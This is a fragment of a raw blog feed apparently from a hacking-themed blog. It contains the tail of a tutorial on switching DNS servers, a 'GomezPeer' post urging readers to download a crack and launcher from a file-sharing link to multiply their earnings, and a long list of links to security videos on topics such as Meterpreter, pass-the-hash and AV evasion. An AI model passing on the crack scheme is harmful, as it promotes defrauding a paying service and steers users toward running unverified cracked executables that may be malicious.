----------------------------------------------&lt;br /&gt;
nameserver 156.154.70.1    # UltraDNS  NXDOMAIN Hijacking&lt;br /&gt;
nameserver 194.119.228.67  # Scarlet-1 BE &lt;br /&gt;
nameserver 193.121.171.135 # SYS-193.121.171.135&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;The Tutorial:&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Download Namebench:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;a href="http://namebench.googlecode.com/files/namebench-1.1.tgz" linkindex="31"&gt;namebench 1.1 source code (requires Python 2.4-2.7)&lt;/a&gt; &lt;/span&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;a href="http://namebench.googlecode.com/files/namebench-1.1.dmg" linkindex="32"&gt;namebench 1.1 for Mac OS X 10.5+&lt;/a&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;a href="http://namebench.googlecode.com/files/namebench-1.1.exe" linkindex="33"&gt;namebench 1.1 for Windows&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;-Extract all files.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;-Click on Start Benchmark (dont change any settings).&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;-Wait for sometime. A html log file will be created.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;-Open that html file&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;-Copy the Primary and secondary server in a notepad.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;DNS changing::&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;If you have broadband&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt;Click &lt;b&gt;Start&lt;/b&gt; &amp;gt; &lt;b&gt;Control Panel&lt;/b&gt; &amp;gt; &lt;b&gt;Network Connections&lt;/b&gt; and select your local network.&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;On the &lt;b&gt;General&lt;/b&gt; tab click &lt;b&gt;Properties&lt;/b&gt; &amp;gt; &lt;b&gt;Internet Protocol (TCP/IP)&lt;/b&gt;.&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Click &lt;b&gt;Properties&lt;/b&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;/ol&gt;The Internet Protocol window will appear. Click &lt;b&gt;Use the following DNS server addresses&lt;/b&gt; and enter the DNS server(s) you copied in notepad (primary and secondary)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;If you have dial-up&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt;Click &lt;b&gt;Start&lt;/b&gt;&amp;gt;&lt;b&gt;My Computer&lt;/b&gt;&amp;gt;&lt;b&gt;Dialup Networking&lt;/b&gt;.&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Right-click on your Internet connection. Then select &lt;b&gt;Properties&lt;/b&gt;.&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Click the &lt;b&gt;Server Types&lt;/b&gt; tab on the window which opens.&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Click &lt;b&gt;TCP/IP Settings&lt;/b&gt;.&lt;br /&gt;
&lt;/li&gt;
&lt;/ol&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt; &lt;/span&gt;</content><link href="http://i-xploit.blogspot.com/feeds/526872749512569484/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/increase-your-internet-speed.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/526872749512569484" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/526872749512569484" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/increase-your-internet-speed.html" rel="alternate" title="Increase your Internet speed." type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-7848594863528513449</id><published>2010-01-20T19:42:00.001+05:30</published><updated>2010-01-20T19:43:57.675+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Earn"/><title type="text">GomezPeer- Ultimate Money Making Method</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.msoci.com/andrea/archives/onlinemoney.jpg" imageanchor="1" linkindex="59" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.msoci.com/andrea/archives/onlinemoney.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;What is GomezPEER?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
The Gomez PEER is a secure, Java-based application that runs in the background of your PC. You may even forget it's there, because it will not disrupt the way you use your computer.&lt;br /&gt;
&lt;br /&gt;
Using advanced, peer-to-peer distributed computing technology, the Gomez PEER combines the spare capacity of PCs around the world to measure the performance of Web sites. After you install the Gomez PEER, it will periodically communicate with Gomez servers via the Internet, signal that it's available for work, and request a work unit. And you will be credited for your online time and work processed approximately every 15 minutes that the application is running.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Based on your computer's characteristics (Internet connection type, geographic location and Internet service provider), your PC will receive instructions to autonomously test the performance of Web sites â€” gathering important metrics that help identify network bottlenecks and performance problems. All of this happens "behind the scenes," even when you're away from your PC or asleep. Finally, your PC will send its results back to Gomez, where they are added to the work of thousands of other PCs around the world.&lt;br /&gt;
&lt;br /&gt;
The Gomez PEER is available for Windows 2000/NT/XP/2003.&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;
&lt;span style="text-decoration: underline;"&gt;How much does it pay?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
This the current rate schedule for the Gomez PEER program. For the definitions for any of the terms shown here, please consult the glossary. These rates are subject to change in accordance with the current terms of service. Your earnings may not reach the maxiumum amount shown.&lt;br /&gt;
Online Time Payments (per day)  $0.10&lt;br /&gt;
Processing Time Payments (per min.)  $0.0005&lt;br /&gt;
Referral Bonus (per Active Referral)  $1.00&lt;br /&gt;
Min. Monthly Payment  $5.00&lt;br /&gt;
Max. Earnings per month  $45.00&lt;br /&gt;
End of Cycle  2009-07-31&lt;br /&gt;
&lt;br /&gt;
NOTE: These are the &lt;span style="font-weight: bold;"&gt;regular&lt;/span&gt; rates. Using the crack you will be able to make more than x10 times more money.&lt;br /&gt;
&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;YOU CAN ALSO USE THE SAME ACCOUNT ON DIFFERENT COMPUTERS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;Does it really pay?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
Yes it really pays&lt;br /&gt;
here is proof of payment:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i237.photobucket.com/albums/ff239/kryonecro/gomezpeer-1.jpg" imageanchor="1" linkindex="60" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i237.photobucket.com/albums/ff239/kryonecro/gomezpeer-1.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;Does it work on VISTA?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
1. Make GomezPeer account&lt;br /&gt;
2. Download GomezPeer&lt;br /&gt;
3. Download crack&lt;br /&gt;
4. Boot up in safe mode (Press F8 while booting to get safe mode option)&lt;br /&gt;
5. Extract the crack to Unrar the crack in C:\Program Files\Gomez\GomezPEER\jre\lib\ext&lt;br /&gt;
6. Wait until finish&lt;br /&gt;
7. Restart PC normally&lt;br /&gt;
8. Download Launcher and unrar both files to a folder on desktop (I named mine GomezPeer Crack)&lt;br /&gt;
9. Find the real Gomez Peer you downloaded from the site(its in C:/&amp;gt;Program Files&amp;gt; Gomez&amp;gt;GomezPeer&amp;gt;Bin)&lt;br /&gt;
10. Copy and paste the program to the folder you made on desktop(in my case GomezPeer Crack)&lt;br /&gt;
&lt;br /&gt;
Load up launcher and follow on screen instructions&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="text-decoration: underline;"&gt;The Tutorial&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
1.) &lt;a href="https://www.gomezpeerzone.com/Apply.aspx?Referrer=sahil2068" linkindex="61"&gt;Signup to GomezPEER&amp;nbsp;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
2.) Download GomezPEER&lt;br /&gt;
&lt;a href="http://www.gomezpeerzone.com/download.aspx" linkindex="62" target="_blank"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
3.) make sure you install GomezPEER in C:\&lt;br /&gt;
&lt;br /&gt;
4.) After you install GomezPEER, you need to crack it.&lt;br /&gt;
&lt;a href="http://uploading.com/files/e7243126/GomezPeer%2528CrackAndLauncher%2529.rar/"&gt;Download GomezPeer(crackAndLauncher).rar&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img505.imageshack.us/img505/100/crackx.png" imageanchor="1" linkindex="65" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="235" src="http://img505.imageshack.us/img505/100/crackx.png" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
5.)Unrar the files onto the desktop.&lt;br /&gt;
&lt;br /&gt;
6.)run the launcher and follow the on screen instructions&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img38.imageshack.us/img38/4453/startz.png" imageanchor="1" linkindex="67" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="203" src="http://img38.imageshack.us/img38/4453/startz.png" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img41.imageshack.us/img41/4616/running.png" imageanchor="1" linkindex="68" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="510" src="http://img41.imageshack.us/img41/4616/running.png" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;You are done! all you do now is leave your computer one 14/7 and with about 17 PEER's you can get $3 a night.&lt;br /&gt;
i have had GormezPEER for over a week and iv only had the crack working for 2 days, and its already doubled my previous amount!!!&lt;br /&gt;
i mean at this moment i'm running 43 PEER's in the past iv ran up to 100!!!</content><link href="http://i-xploit.blogspot.com/feeds/7848594863528513449/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/gomezpeer-ultimate-money-making-method.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/7848594863528513449" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/7848594863528513449" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/gomezpeer-ultimate-money-making-method.html" rel="alternate" title="GomezPeer- Ultimate Money Making Method" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-2163389234289527001</id><published>2010-01-19T20:01:00.001+05:30</published><updated>2010-01-20T19:38:59.481+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type="text">867 Hacking Video Tutorials</title><content type="html">&lt;form action="sitemap.aspx" id="form1" method="post" name="form1"&gt;&lt;div&gt;&lt;input id="__VIEWSTATE" name="__VIEWSTATE" type="hidden" value="/wEPDwUKMTUyNzUzNTM5OGRkpIBs8NQLnywksiikqb27CdDtnmA=" /&gt; &lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img3.immage.de/edit_01088baa50videoiconfull.jpg.png" imageanchor="1" linkindex="2602" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://img3.immage.de/edit_01088baa50videoiconfull.jpg.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Using-Database-Caches-to-Detect-SQL-injection-(SecTor-2009)-video.aspx" linkindex="2603"&gt;Using Database Caches to Detect SQL injection (SecTor 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Nsploit-(Popping-boxes-with-Nmap)-SecTor-2009-video.aspx" linkindex="2604"&gt;Nsploit (Popping boxes with Nmap) SecTor 2009 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Sourcefire-VRT-Vulnerability-Report-January-2010-video.aspx" linkindex="2605"&gt;Sourcefire VRT Vulnerability Report January 2010 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Demo-of-IE-Zero-Day-used-to-Hack-Google-and-Adobe-(Aurora-Exploit)-video.aspx" linkindex="2606"&gt;Demo of IE Zero Day used to Hack Google and Adobe (Aurora Exploit) Video Tutorial&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/SoundRecorder-Meterpreter-Script-Demo-video.aspx" linkindex="2607"&gt;SoundRecorder Meterpreter Script Demo Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Bypassing-Flash-Logins-using-Flasm-video.aspx"&gt;Bypassing Flash Logins using Flasm Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Nexpose-Vulnerability-Scanner-Basic-Usage-video.aspx" linkindex="2608"&gt;Nexpose Vulnerability Scanner Basic Usage Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Nexpose-Vulnerability-Scanner-Installation-video.aspx" linkindex="2609"&gt;Nexpose Vulnerability Scanner Installation Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Adobe-Reader-JavaScript-Blacklist-Framework-video.aspx" linkindex="2610"&gt;Adobe Reader JavaScript Blacklist Framework Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Recording-WebCam-using-Camrecorder-Meterpreter-Script-video.aspx" linkindex="2611"&gt;Recording WebCam using Camrecorder Meterpreter Script Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/HTTP-Session-Hijacking-Demo-using-Hamster-and-Ferret-video.aspx" linkindex="2612"&gt;HTTP Session Hijacking Demo using Hamster and Ferret Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Botnet-Basics-video.aspx" linkindex="2613"&gt;Botnet Basics Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Remote-Buffer-Overflow-Tutorial-(Windows)-video.aspx" linkindex="2614"&gt;Remote Buffer Overflow Tutorial (Windows) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/JUNOS-Kernel-Crash-PoC-video.aspx" linkindex="2615"&gt;JUNOS Kernel Crash PoC Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Reverse-Engineering-101-(CarolinaCon4)-video.aspx" linkindex="2616"&gt;Reverse Engineering 101 (CarolinaCon4) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Arp-Spoofing-101-(CarolinaCon4)-video.aspx" linkindex="2617"&gt;Arp Spoofing 101 (CarolinaCon4) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Format-String-Vulnerabilities-101-(CarolinaCon4)-video.aspx" linkindex="2618"&gt;Format String Vulnerabilities 101 (CarolinaCon4) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Network-Related-Design-Errors-(26th-CCC)-video.aspx" linkindex="2619"&gt;Network Related Design Errors (26th CCC) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/BAFFLE-(Behavioral-Active-Fingerprinting-within-Link-Layer)-video.aspx" linkindex="2620"&gt;BAFFLE (Behavioral Active Fingerprinting within Link Layer) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/HNNCast-for-the-Third-Week-of-December-2009-video.aspx" linkindex="2621"&gt;HNNCast for the Third Week of December 2009 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Reverse-Engineering-DisplayLink-Devices-(26th-CCC)-video.aspx" linkindex="2622"&gt;Reverse Engineering DisplayLink Devices (26th CCC) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/DDoS-and-Botnet-Mitigation-(26th-CCC)-video.aspx" linkindex="2623"&gt;DDoS and Botnet Mitigation (26th CCC) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Building-a-Debugger-(26th-CCC)-video.aspx" linkindex="2624"&gt;Building a Debugger (26th CCC) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Hacking-the-Universe-(26th-CCC)-video.aspx" linkindex="2625"&gt;Hacking the Universe (26th CCC) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Finding-Linux-Rootkits-using-Rkhunter-video.aspx" linkindex="2626"&gt;Finding Linux Rootkits using Rkhunter Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Using-Driftnet-and-Ettercap-with-MITM-to-Spy-on-a-Victim-video.aspx" linkindex="2627"&gt;Using Driftnet and Ettercap with MITM to Spy on a Victim Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Exploit-Programming-Primer-video.aspx" linkindex="2628"&gt;Exploit Programming Primer Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Metasploit-Meterpreter-Reverse-TCP-Basics-video.aspx" linkindex="2629"&gt;Metasploit Meterpreter Reverse TCP Basics Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/SecurityBinge-(Episode-2)-video.aspx" linkindex="2630"&gt;SecurityBinge (Episode 2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/HuffPostNews-Twitter-Account-Hack-Caught-on-Video-video.aspx" linkindex="2631"&gt;HuffPostNews Twitter Account Hack Caught on Video Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Pass-the-Hash-Attack-(Metasploit)-video.aspx" linkindex="2632"&gt;Pass the Hash Attack (Metasploit) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Taking-Screenshots-using-ESPIA-Extension-in-Metasploit-Meterpreter-video.aspx" linkindex="2633"&gt;Taking Screenshots using ESPIA Extension in Metasploit Meterpreter Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Meterpreter-as-a-Service-video.aspx" linkindex="2634"&gt;Meterpreter as a Service Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Pivoting-using-Meterpreter-video.aspx" linkindex="2635"&gt;Pivoting using Meterpreter Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Java-Applet-Attack-using-the-Social-Engineering-Toolkit-video.aspx" linkindex="2636"&gt;Java Applet Attack using the Social Engineering Toolkit Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Kaminsky-DNS-Bug-(Simple-Explanation)-video.aspx" linkindex="2637"&gt;Kaminsky DNS Bug (Simple Explanation) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/W3af-Basics-(Web-Application-Attack-and-Audit-Framework)-video.aspx" linkindex="2638"&gt;W3af Basics (Web Application Attack and Audit Framework) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Blocking-Malicious-Attacks-Using-SQL-Injection-Signature-Evasion-video.aspx" linkindex="2639"&gt;Blocking Malicious Attacks Using SQL Injection Signature Evasion Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Facebook-Privacy-Settings-Update-video.aspx" linkindex="2640"&gt;Facebook Privacy Settings Update Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Do-security-and-privacy-really-matter-on-Facebook-(probe)-video.aspx" linkindex="2641"&gt;Do security and privacy really matter on Facebook (probe) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Client-Side-Database-Protocol-Attack-video.aspx" linkindex="2642"&gt;Client Side Database Protocol Attack Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Reversing-and-Exploiting-an-Apple-Firmware-Update-(Blackhat-2009)-video.aspx" linkindex="2643"&gt;Reversing and Exploiting an Apple Firmware Update (Blackhat 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Old-Skool-Brought-Back-(A-1964-Modem-Demo)-Defcon-17-video.aspx" linkindex="2644"&gt;Old Skool Brought Back (A 1964 Modem Demo) Defcon 17 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Hijacking-Websites-with-SSLstrip-and-SlowLoris-(Defcon-17)-video.aspx" linkindex="2645"&gt;Hijacking Websites with SSLstrip and SlowLoris (Defcon 17) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/That-Awesome-Time-I-Was-Sued-for-Two-Billion-Dollars-(Defcon-17)-video.aspx" linkindex="2646"&gt;That Awesome Time I Was Sued for Two Billion Dollars (Defcon 17) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Threat-Webscape-Predictions-for-2010-by-Websense-Security-Labs-video.aspx" linkindex="2647"&gt;Threat Webscape Predictions for 2010 by Websense Security Labs Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Terminate-RFID-Tags-with-Rfiddler-video.aspx" linkindex="2648"&gt;Terminate RFID Tags with Rfiddler Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Exploitation-Techniques-(Zacon-2009)-video.aspx" linkindex="2649"&gt;Exploitation Techniques (Zacon 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Vulnerability-Management-Scoring-Systems-(Zacon-2009)-video.aspx" linkindex="2650"&gt;Vulnerability Management Scoring Systems (Zacon 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/TCP-Sorcery-(Zacon-2009)-video.aspx" linkindex="2651"&gt;TCP Sorcery (Zacon 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Layer-2-Hackery-(Zacon-2009)-video.aspx" linkindex="2652"&gt;Layer 2 Hackery (Zacon 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/OWASP-Proxy-(Zacon-2009)-video.aspx" linkindex="2653"&gt;OWASP Proxy (Zacon 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/From-Fishing-to-Phishing-(Zacon-2009)-video.aspx" linkindex="2654"&gt;From Fishing to Phishing (Zacon 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Smashing-the-Stats-for-Fun-and-Profit-(Zacon-2009)-video.aspx" linkindex="2655"&gt;Smashing the Stats for Fun and Profit (Zacon 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Google-Scam-Kits-video.aspx" linkindex="2656"&gt;Google Scam Kits Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/DNS-Rebinding-with-Robert-RSnake-Hansen-video.aspx" linkindex="2657"&gt;DNS Rebinding with Robert RSnake Hansen Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Modifying-an-MSN-Conversation-using-an-Ettercap-Filter-video.aspx" linkindex="2658"&gt;Modifying an MSN Conversation using an Ettercap Filter Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Metasploit-AV-Evasion-Technique-video.aspx" linkindex="2659"&gt;Metasploit AV Evasion Technique Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Hacking-WPA-with-Pyrit-video.aspx" linkindex="2660"&gt;Hacking WPA with Pyrit Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Sqlmap-Usage-Demo-video.aspx" linkindex="2661"&gt;Sqlmap Usage Demo Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Xdoor-(Ajax-based-Backdoor)-video.aspx" linkindex="2662"&gt;Xdoor (Ajax based Backdoor) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Bypassing-403-Forbidden-Errors-video.aspx" linkindex="2663"&gt;Bypassing 403 Forbidden Errors Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/DLL-Injection-Basics-video.aspx" linkindex="2664"&gt;DLL Injection Basics Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Websense-Threatscape-(October-2009)-video.aspx" linkindex="2665"&gt;Websense Threatscape (October 2009) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/The-Internet-is-Evil-(Louisville-Infosec)-video.aspx" linkindex="2666"&gt;The Internet is Evil (Louisville Infosec) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/The-Seven-Habits-of-a-Successful-Information-Security-Career-Manager-(Louisville-Infosec)-video.aspx" linkindex="2667"&gt;The Seven Habits of a Successful Information Security Career Manager (Louisville Infosec) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Attacking-SSL-PKI-(Louisville-Infosec)-video.aspx" linkindex="2668"&gt;Attacking SSL PKI (Louisville Infosec) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Blocking-the-Covert-Channels-Used-for-Malicious-Data-Theft-(Louisville-Infosec)-video.aspx" linkindex="2669"&gt;Blocking the Covert Channels Used for Malicious Data Theft (Louisville Infosec) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Darknets-(Fun-and-games-with-Anonymizing-Private-Networks)-(Louisville-Infosec)-video.aspx" linkindex="2670"&gt;Darknets (Fun and games with Anonymizing Private Networks) (Louisville Infosec) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Building-an-Effective-Application-Security-Program-(Louisville-Infosec)-video.aspx" linkindex="2671"&gt;Building an Effective Application Security Program (Louisville Infosec) Video Tutorial&lt;/a&gt;&lt;br /&gt;
